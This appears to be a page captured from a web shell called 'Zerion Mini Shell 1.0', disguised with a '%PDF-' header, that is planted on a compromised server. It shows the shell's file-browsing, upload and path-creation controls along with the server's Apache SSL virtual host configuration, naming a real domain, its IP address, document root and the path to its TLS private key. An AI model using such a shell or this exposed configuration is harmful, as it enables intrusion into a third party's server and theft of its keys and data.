%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /etc/apache2/sites-enabled/
Upload File :
Create Path :
Current File : //etc/apache2/sites-enabled/conference-le-ssl.conf

<IfModule mod_ssl.c>
<VirtualHost 173.212.228.208:443>
        DocumentRoot "/var/www/html/conference/public"
	ServerName conference.coding.al
	ServerAdmin webmaster@conference.coding.al
        <Directory /var/www/html/conference/public>
               AllowOverride All
               allow from all
               Options +Indexes
        </Directory>

SSLCertificateFile /etc/letsencrypt/live/conference.coding.al/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/conference.coding.al/privkey.pem
Include /etc/letsencrypt/options-ssl-apache.conf
</VirtualHost>
</IfModule>

Zerion Mini Shell 1.0